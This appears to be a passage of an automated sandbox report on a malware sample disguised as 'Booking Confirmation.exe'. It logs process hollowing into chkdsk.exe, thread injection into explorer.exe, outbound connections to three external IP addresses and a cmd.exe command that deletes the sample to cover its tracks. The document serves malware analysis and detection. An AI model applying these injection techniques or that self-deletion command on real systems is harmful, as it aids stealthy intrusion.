            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D161A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D0B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D0B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04CEC962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04CEB171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04CEB171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04CE9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04CE9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04CE9100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D1513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D1513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D04120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D04120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D04120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D04120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D04120 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D12ACB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D12AE4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D1D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D1D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D1FAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04CE52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04CE52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04CE52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04CE52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04CE52A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04CFAAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04CFAAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D74257 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04CE9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04CE9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04CE9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04CE9240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04DAEA55 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D2927A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D9B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D9B260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04DB8A62 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04CF8A0A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04D03A1C mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04DAAA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04DAAA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04CEAA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 8_2_04CEAA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\Booking Confirmation.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\Booking Confirmation.exeProcess token adjusted: Debug
            Source: C:\Windows\SysWOW64\chkdsk.exeProcess token adjusted: Debug
            Source: C:\Users\user\Desktop\Booking Confirmation.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Windows\explorer.exeNetwork Connect: 156.227.187.201 80
            Source: C:\Windows\explorer.exeNetwork Connect: 185.175.200.247 80
            Source: C:\Windows\explorer.exeNetwork Connect: 81.169.149.11 80
            Maps a DLL or memory area into another processShow sources
            Source: C:\Users\user\Desktop\Booking Confirmation.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\Booking Confirmation.exeSection loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\Booking Confirmation.exeSection loaded: unknown target: C:\Windows\SysWOW64\chkdsk.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Windows\SysWOW64\chkdsk.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Modifies the context of a thread in another process (thread injection)Show sources
            Source: C:\Users\user\Desktop\Booking Confirmation.exeThread register set: target process: 3424
            Source: C:\Windows\SysWOW64\chkdsk.exeThread register set: target process: 3424
            Queues an APC in another process (thread injection)Show sources
            Source: C:\Users\user\Desktop\Booking Confirmation.exeThread APC queued: target process: C:\Windows\explorer.exe
            Sample uses process hollowing techniqueShow sources
            Source: C:\Users\user\Desktop\Booking Confirmation.exeSection unmapped: C:\Windows\SysWOW64\chkdsk.exe base address: 2E0000
            Source: C:\Users\user\Desktop\Booking Confirmation.exeProcess created: C:\Users\user\Desktop\Booking Confirmation.exe C:\Users\user\Desktop\Booking Confirmation.exe
            Source: C:\Users\user\Desktop\Booking Confirmation.exeProcess created: C:\Users\user\Desktop\Booking Confirmation.exe C:\Users\user\Desktop\Booking Confirmation.exe
            Source: C:\Windows\SysWOW64\chkdsk.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Booking Confirmation.exe'
            Source: explorer.exe, 00000006.00000000.675063336.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
            Source: explorer.exe, 00000006.00000002.912608119.0000000001080000.00000002.00000001.sdmp, chkdsk.exe, 00000008.00000002.914393004.0000000006150000.00000002.00000001.sdmpBinary or memory string: Program Manager
            Source: explorer.exe, 00000006.00000002.923187943.0000000005E50000.00000004.00000001.sdmp, chkdsk.exe, 00000008.00000002.914393004.0000000006150000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000006.00000002.912608119.0000000001080000.00000002.00000001.sdmp, chkdsk.exe, 00000008.00000002.914393004.0000000006150000.00000002.00000001.sdmpBinary or memory string: Progman
            Source: explorer.exe, 00000006.00000002.912608119.0000000001080000.00000002.00000001.sdmp, chkdsk.exe, 00000008.00000002.914393004.0000000006150000.00000002.00000001.sdmpBinary or memory string: Progmanlock
            Source: explorer.exe, 00000006.00000000.693941917.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Users\user\Desktop\Booking Confirmation.exe VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\Booking Confirmation.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
